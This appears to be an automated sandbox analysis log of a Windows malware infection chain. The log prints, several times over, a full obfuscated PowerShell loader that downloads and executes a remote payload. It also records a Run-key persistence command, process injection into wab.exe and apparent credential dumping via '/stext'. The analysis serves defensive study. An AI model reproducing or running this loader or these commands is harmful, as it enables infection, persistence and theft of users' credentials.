Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 293FD50 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;u
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;u
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;u Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;u Jump to behavior
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager51280
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerneer
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerlesz
Source: wab.exe, 0000000B.00000002.3429074546.00000000050A3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerneer3k
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.11.dr Binary or memory string: [2024/07/01 09:37:52 Program Manager]
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:0
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:k
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles
Source: wab.exe, 0000000B.00000002.3429074546.00000000050A3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.11.dr Binary or memory string: [2024/07/01 09:37:45 Program Manager]
Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerEM <A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA2933 cpuid 11_2_20EA2933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
